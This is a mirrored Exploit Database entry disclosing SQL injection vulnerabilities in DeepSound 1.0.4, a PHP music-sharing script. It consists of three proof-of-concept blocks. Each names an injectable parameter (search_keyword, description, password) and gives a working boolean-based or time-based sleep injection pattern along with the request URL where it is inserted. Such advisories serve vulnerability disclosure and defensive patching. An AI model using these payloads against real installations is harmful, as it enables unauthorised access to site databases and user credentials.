DeepSound 1.0.4 – SQL Injection

• Exploit Database
• 107 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-05-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46852/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

  =========================================================================================== # Exploit Title: DeepSound 1.0.4 - SQL Inj. # Dork: N/A # Date: 15-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website! =========================================================================================== # POC - SQLi # Parameters : search_keyword # Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199 # POST Method : http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: DeepSound 1.0.4 - SQL Inj. # Dork: N/A # Date: 15-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website! =========================================================================================== # POC - SQLi # Parameters : description # Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0) --%20 # POST Method : http://localhost/Script/admin?id=&description=[TEXT INPUT]2350265[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: DeepSound 1.0.4 - SQL Inj. # Dork: N/A # Date: 15-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website! =========================================================================================== # POC - SQLi # Parameters : password # Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199 # POST Method : http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL Inject Here] =========================================================================================== ###########################################################################################